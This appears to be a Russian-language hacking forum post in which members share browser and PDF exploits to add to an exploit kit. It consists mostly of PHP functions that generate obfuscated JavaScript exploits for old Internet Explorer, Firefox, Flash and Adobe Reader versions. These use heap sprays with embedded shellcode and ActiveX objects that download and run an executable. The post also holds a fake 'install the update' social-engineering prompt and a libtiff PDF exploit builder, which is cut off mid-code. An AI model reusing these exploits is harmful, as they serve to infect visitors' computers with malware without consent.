Предлогаю выкладывать сдесь актуальные сплойты которые можно воткнуть в связку. Начну пожалуй: IE 7 PHP: function mem_cor() { $memcor_name = get_random_string_array(rand(8,15), '15'); $content = ' var '. $memcor_name[0] .' = unescape('._shellcode(mem_cor).'); var '. $memcor_name[1] .' = new Array(); var '. $memcor_name[2] .' = 0x100000-('. $memcor_name[0] .'.length*2+0x01020); var '. $memcor_name[4] .' = unescape("%u0C0C%u0C0C"); while('. $memcor_name[4] .'.length<'. $memcor_name[2] .'/2) { '. $memcor_name[4] .'+='. $memcor_name[4] .';} var '. $memcor_name[3] .' = '. $memcor_name[4] .'.substring(0,'. $memcor_name[2] .'/2); delete '. $memcor_name[4] .'; for('. $memcor_name[5] .'=0; '. $memcor_name[5] .'<0xC0; '. $memcor_name[5] .'++) { '. $memcor_name[1] .'['. $memcor_name[5] .'] = '. $memcor_name[3] .' + '. $memcor_name[0] .'; } CollectGarbage(); var '. $memcor_name[6] .'=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var '. $memcor_name[7] .' = new Array(); for(var '. $memcor_name[11] .'=0;'. $memcor_name[11] .'<1000;'. $memcor_name[11] .'++) '. $memcor_name[7] .'.push(document.createElement("img")); function '. $memcor_name[10] .'() { '. $memcor_name[8] .'=document.createElement("tbody"); '. $memcor_name[8] .'.click; var '. $memcor_name[9] .' = '. $memcor_name[8] .'.cloneNode(); '. $memcor_name[8] .'.clearAttributes(); '. $memcor_name[8] .'=null; CollectGarbage(); for(var '. $memcor_name[11] .'=0;'. $memcor_name[11] .'<'. $memcor_name[7] .'.length;'. $memcor_name[11] .'++) '. $memcor_name[7] .'['. $memcor_name[11] .'].src='. $memcor_name[6] .'; '. $memcor_name[9] .'.click; } window.setTimeout("'. $memcor_name[10] .'();",500); '; return $content; } Mdac IE 6 PHP: function mdac() // ie 6 ... {global $url; $mdac_name = get_random_string_array(rand(8,19), '15'); $content = ' var '. $mdac_name[0] .'=\''.$url.'?spl=mdac\'; function '. $mdac_name[1] .'('. $mdac_name[7] .','. $mdac_name[8] .'){ var '. $mdac_name[2] .'=null; try{'. $mdac_name[2] .'='. $mdac_name[7] .'.CreateObject('. $mdac_name[8] .')}catch(e){} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.CreateObject('. $mdac_name[8] .',"")}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.CreateObject('. $mdac_name[8] .',"","")}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.GetObject("",'. $mdac_name[8] .')}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.GetObject('. $mdac_name[8] .',"")}catch(e){}} if(!'. $mdac_name[2] .'){try{'. $mdac_name[2] .'='. $mdac_name[7] .'.GetObject('. $mdac_name[8] .')}catch(e){}} return('. $mdac_name[2] .'); } function '. $mdac_name[3] .'('. $mdac_name[9] .'){ '. $mdac_name[10] .'="file.exe";var '. $mdac_name[4] .'='. $mdac_name[9] .'.CreateObject("Scripting.FileSystemObject",""); var sap='. $mdac_name[1] .'('. $mdac_name[9] .',"Sh"+"e"+"l"+"l.App"+"l"+"ica"+"t"+"i"+"on"); var '. $mdac_name[11] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"ADODB.Stream"); var '. $mdac_name[5] .'=null;'. $mdac_name[10] .'='. $mdac_name[4] .'.BuildPath('. $mdac_name[4] .'.GetSpecialFolder(2),'. $mdac_name[10] .');'. $mdac_name[11] .'.Mode=3; try{'. $mdac_name[5] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"Mic"+"ro"+"so"+"ft.XM"+"LH"+"T"+"TP");'. $mdac_name[5] .'.open("G"+"ET",'. $mdac_name[0] .',false);} catch(e){try{'. $mdac_name[5] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"MSX"+"M"+"L2.XML"+"HT"+"TP");'. $mdac_name[5] .'.open("GE"+"T",'. $mdac_name[0] .',false);} catch(e){try{'. $mdac_name[5] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"M"+"SX"+"ML2.Se"+"rv"+"erX"+"MLHT"+"TP");'. $mdac_name[5] .'.open("GET",'. $mdac_name[0] .',false);} catch(e) { try { '. $mdac_name[5] .'=new XMLHttpRequest(); '. $mdac_name[5] .'.open("GET",'. $mdac_name[0] .',false); } catch(e){return 0;}}}} '. $mdac_name[11] .'.Type=1;'. $mdac_name[5] .'.send(null);rb='. $mdac_name[5] .'.responseBody;'. $mdac_name[11] .'.Open();'. $mdac_name[11] .'.Write(rb);'. $mdac_name[11] .'.SaveTofile('. $mdac_name[10] .',2);sap.ShellExecute('. $mdac_name[10] .'); return 1; } function '. $mdac_name[6] .'(){ var '. $mdac_name[12] .'=0; var '. $mdac_name[6] .'d=new Array(\'BD96C556-65A3-11D0-983A-00C04FC29E36\',\'BD96C556-65A3-11D0-983A-00C04FC29E30\',\'AB9BCEDD-EC7E-47E1-9322-D4A210617116\',\'0006F033-0000-0000-C000-000000000046\',\'0006F03A-0000-0000-C000-000000000046\',\'6e32070a-766d-4ee6-879c-dc1fa91d2fc3\',\'6414512B-B978-451D-A0D8-FCFDF33E833C\',\'7F5B7F63-F06F-4331-8A26-339E03C0AE3D\',\'06723E09-F4C2-43c8-8358-09FCD1DB0766\',\'639F725F-1B2D-4831-A9FD-874847682010\',\'BA018599-1DB3-44f9-83B4-461454C84BF8\',\'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19\',\'E8CCCDDF-CA28-496b-B050-6C07C962476B\',null); while('. $mdac_name[6] .'d['. $mdac_name[12] .']) { var '. $mdac_name[9] .'=null; '. $mdac_name[9] .'=document.createElement("object"); '. $mdac_name[9] .'.setAttribute("classid","clsid:"+'. $mdac_name[6] .'d['. $mdac_name[12] .']); if('. $mdac_name[9] .'){try{var '. $mdac_name[13] .'='. $mdac_name[1] .'('. $mdac_name[9] .',"S"+"he"+"l"+"l.App"+"lica"+"ti"+"on"); if('. $mdac_name[13] .'){if('. $mdac_name[3] .'('. $mdac_name[9] .'))return 1;}}catch(e){}} '. $mdac_name[12] .'++; } } '. $mdac_name[6] .'(); '; return $content; } Mozilla Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC PHP: function jno() // Mozilla Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC { $jno_name = get_random_string_array(rand(3,19), '15'); $content = ' var '. $jno_name[0] .' = ' . _shellcode(jno) . '; var '. $jno_name[1] .' = unescape('. $jno_name[0] .'); var '. $jno_name[2] .' = unescape(\'%u0800\'); var '. $jno_name[3] .' = 0x08000800; var '. $jno_name[4] .'; var '. $jno_name[5] .'; var '. $jno_name[6] .'; var '. $jno_name[7] .' = \'\' + navigator.userAgent; if ('. $jno_name[7] .'.indexOf(\'Windows\') != -1) { '. $jno_name[4] .' = '. $jno_name[1] .'; '. $jno_name[5] .' = '. $jno_name[3] .'; '. $jno_name[6] .' = '. $jno_name[2] .'; } var '. $jno_name[8] .' = '. $jno_name[6] .'; while ('. $jno_name[8] .'.length <= 0x400000) '. $jno_name[8] .'+='. $jno_name[8] .'; var '. $jno_name[9] .' = new Array(); for (var '. $jno_name[10] .' =0; '. $jno_name[10] .'<36; '. $jno_name[10] .'++) { '. $jno_name[9] .'['. $jno_name[10] .'] = '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .' + '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .' + '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .' + '. $jno_name[8] .'.substring(0, 0x100000 - '. $jno_name[4] .'.length) + '. $jno_name[4] .'; } if (window.navigator.javaEnabled) { window.navigator = ('. $jno_name[5] .' / 2); try { java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0 ); }catch(e){} } '; return $content; } Mozilla Firefox <= 3.5.0 PHP: [PHP]function font_tags() // Mozilla Firefox <= 3.5.0 просмотреть эксп, проверить на версиях 2.х, 3х { $font_name = get_random_string_array(rand(3,19), '15'); $content = ' <html> <head> <div id="'. $font_name[12] .'"> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> var '. $font_name[0] .' = ' . _shellcode(Font_FireFox) . '; var '. $font_name[1] .' = unescape('. $font_name[0] .'); var '. $font_name[2] .' = unescape("%u0c0c%u0c0c"); while ('. $font_name[2] .'.length<0x60000) { '. $font_name[2] .' += '. $font_name[2] .'; } '. $font_name[3] .' = new Array(); for (i=0; i<600; i++) { '. $font_name[3] .'[i] = '. $font_name[2] .' + '. $font_name[1] .'; } var '. $font_name[4] .' = new Array() function '. $font_name[5] .'('. $font_name[6] .') { var i; var c; var '. $font_name[7] .'=""; for(i=0;i<'. $font_name[6] .'.length;i++) { c='. $font_name[6] .'.charAt(i); if(c=="&" || c=="?" || c=="=" || c=="%" || c==" ") c = escape(c); '. $font_name[7] .'+=c; } return '. $font_name[7] .'; } function '. $font_name[8] .'(){ '. $font_name[4] .' = new Array(); '. $font_name[4] .'[0] = new Array(); '. $font_name[4] .'[0]["str"] = "blah"; var '. $font_name[10] .' = document.getElementById("'. $font_name[12] .'") if (document.getElementsByTagName) { var i=0; '. $font_name[11] .' = '. $font_name[10] .'.getElementsByTagName("p") if ('. $font_name[11] .'.length > 0) while (i<'. $font_name[11] .'.length) { '. $font_name[13] .' = '. $font_name[11] .'[i].getElementsByTagName("font") '. $font_name[4] .'[i+1] = new Array() if ('. $font_name[13] .'[0]) { '. $font_name[4] .'[i+1]["str"] = '. $font_name[13] .'[0].innerHTML; } i++ } } } function '. $font_name[9] .'() { var html = ""; for (i=1;i<'. $font_name[4] .'.length;i++) { html += '. $font_name[5] .'('. $font_name[4] .'[i]["str"]) } } '. $font_name[8] .'(); '. $font_name[9] .'() </script> '; return $content; } FireFox PDF PHP: [PHP]function pdf_ff() { global $pdf; $pdf_ff_name = get_random_string_array(rand(3,19), '5'); $content = ' function '. $pdf_ff_name[0] .'() { var '. $pdf_ff_name[1] .' = false; try {if( navigator.plugins && navigator.mimeTypes.length) {for( var '. $pdf_ff_name[2] .' = 0; '. $pdf_ff_name[2] .' < navigator.plugins.length; '. $pdf_ff_name[2] .'++) {var '. $pdf_ff_name[3] .' = navigator.plugins['. $pdf_ff_name[2] .'].name; if( '. $pdf_ff_name[3] .'.indexOf("Adobe Acrobat") != -1) {'. $pdf_ff_name[1] .' = true;break;}}} }catch(e){} if('. $pdf_ff_name[1] .') { document.write(\'<embed src="'.$pdf.'?spl=pdf_ff" width='.rand(10,499).' height='.rand(10,499).' style="border:none" type="application/pdf"></embed>\'); } else return false; } '. $pdf_ff_name[0] .'(); '; return $content; } Opera PDF PHP: [PHP]function pdf_op() { global $pdf; $pdf_op_name = get_random_string_array(rand(3,19), '5'); $content = ' function '. $pdf_op_name[0] .'() { var '. $pdf_op_name[1] .' = false; try { if( navigator.plugins && navigator.mimeTypes.length) {for( var '. $pdf_op_name[2] .' = 0; '. $pdf_op_name[2] .' < navigator.plugins.length; '. $pdf_op_name[2] .'++) {var '. $pdf_op_name[3] .' = navigator.plugins['. $pdf_op_name[2] .'].name; if( '. $pdf_op_name[3] .'.indexOf("Adobe Acrobat") != -1) {'. $pdf_op_name[1] .' = true;break;}}} } catch(e){} if('. $pdf_op_name[1] .') { document.write(\'<embed src="'.$pdf.'?spl=pdf_op" width='.rand(10,499).' height='.rand(10,499).' style="border:none" type="application/pdf"></embed>\'); } else return false; } '. $pdf_op_name[0] .'(); '; return $content; }
IE PDF PHP: [PHP]function pdf_ie() { global $pdf,$case_spl; $pdf_ie_name = get_random_string_array(rand(7,19), '8'); //if ((ver <= "7.1.1") || (ver >= "8.0.0") && (ver <= "8.1.4") || (ver == "9.0.0")) $O000000OO = ' document.write("<OBJECT id=jdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>"); var ver = jdf1.GetVersions(); ver = ver.split(","); ver = ver[1].split("="); ver = ver[1]; if ((ver < "7.1.4") || (ver < "8.1.7") || (ver < "9.2")) { document.write(\'<iframe src="'.$pdf.'" width="'.rand(40, 499).'" height="'.rand(40, 499).'" frameborder="0"></iframe>\'); } else { setTimeout("dorefresh();",1000); } '; return $O000000OO; } function pdf_2() { global $pdf; $O000000OO=' <object height="1" width="1" type="application/pdf" data="'.$pdf.'"> <param name="src" value="1.pdf"> </object> '; return $O000000OO; } PDF ALL PHP: function pdf_all() { global $pdf; $O000000OO = 'document.write("<iframe src=\"'.$pdf.'?spl=pdf_all\" width=\"'.rand(40, 499).'\" height=\"'.rand(40, 499).'\" frameborder=\"0\"></iframe>");'; return $O000000OO; } //=========================================================// PDF //=========================================================// function activex_pack() { global $load,$url; $O000000OO = ' <object classid="clsid:97AF4A45-49BE-4485-9F55-91AB40F288F2"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:97AF4A45-49BE-4485-9F55-91AB40F22B92"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:97AF4A45-49BE-4485-9F55-91AB40F22BF2"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:18A295DA-088E-42D1-BE31-5028D7F9B965"> <PARAM NAME="OpenWebFile" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:3356DB7C-58A7-11D4-AA5C-006097314BF8"> <PARAM NAME="installAppMgr" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10"> <PARAM NAME="PerformUpdateAsync" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <object classid="clsid:2BCEAECE-6121-4E78-816C-8CD3121361B0"> <PARAM NAME="ExecutePreferredApplication" VALUE="'.$load.'?spl=ActiveX_pack"> </object> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61"> <PARAM NAME="propWidth" VALUE="0"> <PARAM NAME="propHeight" VALUE="0"> <PARAM NAME="propDownloadUrl" VALUE="'.$load.'?spl=ActiveX_pack"> <PARAM NAME="propPostDownloadAction" VALUE="run"> </OBJECT> <OBJECT id="sysWIN" WIDTH=1 HEIGHT=1 classid="clsid:BADA82CB-BF48-4D76-9611-78E2C6F49F03" codebase="'.$url.'/Bol.CAB"> </OBJECT> <script language="vbscript"> sysWIN.url = "'.$load.'?spl=ActiveX_pack" sysWIN.fontsize = 10 sysWIN.barcolor = 00FF00 sysWIN.start = "start" </script> '; return $O000000OO; } function java_exec() { global $load; $url = $load . "?spl=javar"; $url = base64_encode($url); $O000000OO = ' <applet code="ghsdr.Jewredd.class" archive="5734.jar" width="150" height="620"> <param name="data" VALUE="'.$url.'"> <param name="cc" value="1"> </applet> '; return $O000000OO; } function next_spl($refr) { global $O0000000O,$OOOOOO000,$OOOOO0000,$OOOO00000; $O0000000O++; $O000000OO = ' function dorefresh(){ window.location="?spl='.$O0000000O.'&br='.$OOOOOO000.'&vers='.$OOOOO0000[2].'&s='.$OOOO00000.'"; } setTimeout("dorefresh();",'.$refr.'000); '; return $O000000OO; } function flash10() { global $url; $content =' function flash_version(){ var d, n = navigator, m, f = \'Shockwave Flash\'; if((m = n.mimeTypes) && (m = m["application/x-shockwave-flash"]) && m.enabledPlugin && (n = n.plugins) && n[f]) {d = n[f].description} else if (window.ActiveXObject) { try { d = (new ActiveXObject((f+\'.\'+f).replace(/ /g,\'\'))).GetVariable(\'$version\');} catch (e) {}} return d ? d.replace(/\D+/,\'\').split(/\D+/) : [0,0]; } function start_flash(){ document.write(\'<object width="50" height="40"><param name="movie" value="done.swf"><embed src="'.$url.'/98757182190.swf" width="550" height="400"></embed></object>\'); var memory; var nop = unescape("%u0c0c%u0c0c"); var SC=unescape('._shellcode("flash").'); while(nop.length <= 0x10000/2) nop+=nop; nop=nop.substring(0,0x10000/2 - SC.length); memory=new Array(); for(i=0;i<0x800;i++){memory[i]=nop + SC;} } var verss = flash_version()[0]+"."+flash_version()[1]+"."+flash_version()[2]; if (flash_version()[0] == "10") { if (flash_version()[2] < "32") { start_flash(); } else { // document.write(\'<iframe src="http://domx0.cn/arend_my/load.php?spl=not" width="0" height="0" frameborder="0"></iframe>\'); } } if (flash_version()[0] == "9") { if (flash_version()[2] < "246") { start_flash(); } } '; return $content; } function soc() { global $soc_pack; $O000000OO = ' <SCRIPT LANGUAGE="javascript"> function fakes() { if (confirm("Warning! Your browser is old. \n please install the update")) { parent.location="soc.php"; } else { } } fakes(); </SCRIPT> '; if ($soc_pack =="0"){ $xxx = '';} else $xxx = $O000000OO; return $xxx; } function newie() { $O000000OO = ' function LoaD(){ document.getElementsByTagName(\'STYLE\')[0].outerHTML++; } function HeapSpray(){ var unspacese = unescape; var shellcode = unspacese("%uf527%uf940%u4991%uf59b%uf591%uf593%u3743%u4793%ufd96%u97d6%u4b97%u9046%u4643%u4296%u4f98%u4241%u929f%u4793%u4f41%u47f8%uf89b%u9f4b%u4ff8%u424f%u4099%u484e%u924b%u91fc%uf897%ufc90%u4a4e%ufd43%u9137%ufd9f%uf847%u48fc%u4242%uf599%u4bfd%ud69b%u9b42%u379b%u4092%u4ed6%u374b%u37f5%ufcd6%u4f41%u9291%u3749%u2797%u92d6%u2792%u41f8%u9741%u4048%u4143%u9f4b%u4a9b%u4296%u9b48%u9249%u4648%u9b4a%ufc96%u2ff5%u9b99%u4791%ufc91%ud6f9%u3791%uf527%u9b99%u374f%u969b%u9b4b%u40f8%u9b43%u9149%u4a92%u4891%ud62f%u41d6%u4f98%u4f42%ufc9f%u9090%u4a37%u9290%u4ad6%u9747%ufd49%u914b%u924e%u4f90%u4848%u43fc%u4040%u9941%u2743%u98f8%u3f47%u4892%u964a%ud637%u4a91%u49fc%u932f%uf527%u4646%u4990%u9196%ufc47%ud690%u9298%uf5f8%u91f9%u47f9%u4637%u99fc%u404f%u4048%u9246%u9947%u4e4e%u4a27%u9b96%u4bfc%u3f96%u49f8%u2f4f%u9b4f%ud693%uf84a%u90d6%u4391%ufc3f%u4342%u962f%u404f%u974a%ud69f%uf8f9%u4240%u9798%ufc93%u4947%ufd4b%u4240%u4b97%u4f37%u4e96%u4f96%u962f%u3741%u37f5%u4f42%uf84e%u9190%ufc90%u4e99%ufd4f%ufd9f%u4a47%u4e3f%ufc9b%u2f4b%u9393%ud63f%u4297%ufd93%u3f40%u4747%u9897%ufd46%u9396%u4392%u374b%u4743%ufc37%uf543%uf890%u4af9%u973f%u92f5%u27f9%u9891%u2fd6%ufc46%u4347%u4f91%u40f8%u4b96%u93f8%u9696%u472f%u9646%u3ff5%u9646%u9f43%u4296%u9340%u429b%u91fd%u464a%u49f9%u9b37%u4ad6%u47f9%u9f48%u37fd%u4391%u494f%u914b%ufc4a%u929b%u279f%uf52f%u4699%u96f5%u9f43%u4e27%u9927%u4a93%u922f%u4648%u4e9f%u4793%u4afc%uf837%ufc40%ufd4e%u96fd%u4a98%ufc3f%ufd4f%u4ffc%u3f4e%u92fc%u409b%u9140%u4640%u4697%u4b47%u4f90%u9f49%u2f41%u4190%ud69b%u37fc%u274f%u2f4f%u4f9f%u2f48%u4e40%u3f4a%u4f93%ufd97%u9b4b%u2748%u9999%u4f9f%u9292%u379b%u4f90%u93fc%u4f4b%u2793%u3793%u2f43%uf897%u414e%uf927%u4297%uf948%uf54b%u4afc%u9748%u2f2f%u9f46%uf94b%u3799%u9946%u4047%u494b%u9ff5%uf996%u492f%u3f93%u2ffc%u489f%u9843%u3f4e%u9848%ufd41%uf94b%u42fd%ud642%u372f%u42f9%ufd4e%u9f41%u4047%u4b2f%u964a%u4f2f%u97fc%u424b%u2740%u9bd6%u9341%u494f%ud6d6%u9147%u49fc%u4b4a%u92f5%uf54b%u4e4f%u3f4f%ufd99%u9bf8%u2797%u2f93%u9197%u2f42%u3f2f%u2742%u9b4e%u42f5%u4143%uf896%u484f%ud647%u272f%u96fc%u9349%u4697%uf597%uf83f%u2f97%u9198%u4193%u429f%u4b48%u4349%u914e%u2fd6%u9b2f%u4f98%u9b93%u4827%u4698%u4a9f%uf54b%u4f47%u9f9b%u924f%u9143%u9642%u91f8%uf549%u9992%u9327%uf8f5%u4691%u91fc%u9237%u46fd%u3f92%ud646%u3f49%u37f9%u4999%u9692%u4a9f%u902f%u929b%u4698%u4f91%u9393%u4342%u4837%u3348%ub1c9%uba34%ubfe7%ub4f5%uc4d9%u74d9%uf424%u315e%u1056%uc683%u0304%u0c56%u4a05%u7074%u479d%u8688%u40e1%u79fe%u9119%uf361%ua0fc%u67b3%u9075%ue303%u19db%ua1ef%uaacf%u6d9d%u1be0%u482b%u9ccf%u549d%u5f83%u28bf%ub3d9%u101f%uc612%u555e%u294e%u0e32%u9805%u3ba3%u215b%uebc5%u19d0%u8ebd%ued26%u9077%u5e76%uda03%ud46e%ufb4b%u398f%uc788%u36c6%ub37b%u9ed9%u3cb5%udee8%u031a%ud2c5%u4363%u0ce1%ubf16%ub012%u0421%u6e69%u99a7%ue5c9%u7a1f%u2ae8%u09f9%u87e6%u568d%u16ea%ued41%u9216%u2264%ue09f%ue642%ub3c4%ubfeb%u12a0%udf13%uca0c%uabb1%u1fbe%uf1c3%uded4%u8c41%ue191%u8f59%u89b1%u0468%ucd5e%ucf74%u311b%uda97%uda51%u8f0e%u87d8%u65b0%ube1e%u8c32%u45de%ue52a%u02db%u15ec%u1b91%u1999%u1b06%u7988%u8fc9%u5050%u286c%uacf2"); var bigblock = unspacese( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); var headersize = 20 + shellcode.length; while (bigblock.length < headersize) bigblock+=bigblock; fillblock = bigblock.substring(0,headersize); block = bigblock.substring(0,bigblock.length-headersize); while(block .length+headersize < 0x90000) block = block +block +fillblock; var memory = new Array(); for (cnt=0;cnt<1000;cnt++) memory[cnt]=block +shellcode; LoaD(); } '; $xxx = ''; return $O000000OO; }
Легендарный PDF libbtiff на данный момент входит во все приват связки эксплойтов!! PHP: <?php //error_reporting(0); include ('shellcode.php'); include ('Includes/ascii85.php'); function Generate_Exploit() { // $Shellcode = Generate_Shellcode(); $Shellcode = RetrieveShellCode_PDF("4"); $Shellcode_Offset = 1500; $Exploit_Offset = 8248; $Exploit = "\x49\x49\x2a\x00"; $Exploit = $Exploit.pack("L", $Exploit_Offset); $Exploit = $Exploit.str_repeat("\x90", $Shellcode_Offset); $Exploit = $Exploit.$Shellcode; $Exploit = $Exploit.str_repeat("\x90", $Exploit_Offset - 8 - strlen($Shellcode) - $Shellcode_Offset); $Exploit = $Exploit."\x07\x00\x00\x01\x03\x00\x01\x00"; $Exploit = $Exploit."\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00"; $Exploit = $Exploit."\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01"; $Exploit = $Exploit."\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00"; $Exploit = $Exploit."\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20"; $Exploit = $Exploit."\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00"; $Exploit = $Exploit."\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01"; $Exploit = $Exploit."\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00"; $Exploit = $Exploit."\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8"; $Exploit = $Exploit."\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C"; $Exploit = $Exploit."\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01"; $Exploit = $Exploit."\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15"; $Exploit = $Exploit."\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11"; $Exploit = $Exploit."\x00\x07"; $Exploit = base64_encode($Exploit); return $Exploit; } ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// function Generate_XML() { $Exploit = Generate_Exploit(); $XML = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/1.0/\">\r\n<present>\r\n<pdf>\r\n<version>1.65</version>\r\n<interactive>1</interactive>\r\n<linearized>1</linearized>\r\n</pdf>\r\n<xdp>\r\n<packets>*</packets>\r\n</xdp>\r\n<destination>pdf</destination>\r\n</present>\r\n</config>\r\n<template baseProfile=\"interactiveForms\" xmlns=\"http://www.xfa.org/schema/xfa-template/2.4/\">\r\n<subform name=\"topmostSubform\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet>\r\n<pageArea id=\"PageArea1\" name=\"PageArea1\">\r\n<contentArea name=\"ContentArea1\" x=\"0pt\" y=\"0pt\" w=\"612pt\" h=\"792pt\" />\r\n<medium short=\"612pt\" long=\"792pt\" stock=\"custom\" />\r\n</pageArea>\r\n</pageSet>\r\n<subform name=\"Page1\" x=\"0pt\" y=\"0pt\" w=\"612pt\" h=\"792pt\">\r\n<break before=\"pageArea\" beforeTarget=\"#PageArea1\" />\r\n<bind match=\"none\" />\r\n<field name=\"ImageField1\" w=\"28.575mm\" h=\"1.39mm\" x=\"37.883mm\" y=\"29.25mm\">\r\n<ui>\r\n<imageEdit />\r\n</ui>\r\n</field>\r\n<?templateDesigner expand 1?>\r\n</subform>\r\n<?templateDesigner expand 1?>\r\n</subform>\r\n<?templateDesigner FormTargetVersion 24?>\r\n<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>\r\n<?templateDesigner Zoom 94?>\r\n</template>\r\n<xfa:datasets xmlns:xfa=\"http://www.xfa.org/schema/xfa-data/1.0/\">\r\n<xfa:data>\r\n<topmostSubform>\r\n<ImageField1 xfa:contentType=\"image/tif\" href=\"\">".$Exploit."</ImageField1>\r\n</topmostSubform>\r\n</xfa:data>\r\n</xfa:datasets>\r\n<PDFSecurity xmlns=\"http://ns.adobe.com/xtd/\" print=\"1\" printHighQuality=\"1\" change=\"1\" modifyAnnots=\"1\" formFieldFilling=\"1\" documentAssembly=\"1\" contentCopy=\"1\" accessibleContent=\"1\" metadata=\"1\" />\r\n<form checksum=\"a5Mpguasoj4WsTUtgpdudlf4qd4=\" xmlns=\"http://www.xfa.org/schema/xfa-form/2.8/\">\r\n<subform name=\"topmostSubform\">\r\n<instanceManager name=\"_Page1\" />\r\n<subform name=\"Page1\">\r\n<field name=\"ImageField1\" />\r\n</subform>\r\n<pageSet>\r\n<pageArea name=\"PageArea1\" />\r\n</pageSet>\r\n</subform>\r\n</form>\r\n</xdp:xdp>\r\n\r\n"; return $XML; } ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// ///////////////////////////////////////////////////////// function Generate_PDF() { $Newline = "\r\n"; $Ascii_85 = new ASCII85(); $XML = gzcompress(Generate_XML()); $XML = $Ascii_85->encode($XML); $PDF = "%PDF-1.6".$Newline; $PDF = $PDF."1 0 obj".$Newline; // $PDF = $PDF."<</Length ".strlen($XML)." /Filter [/ASCII85Decode/FlateDecode]/Type /EmbeddedFile>>".$Newline; //Experimental $PDF = $PDF."<</Filter /ASCII85Decode/FlateDecode/Length ".strlen($XML)."/Type 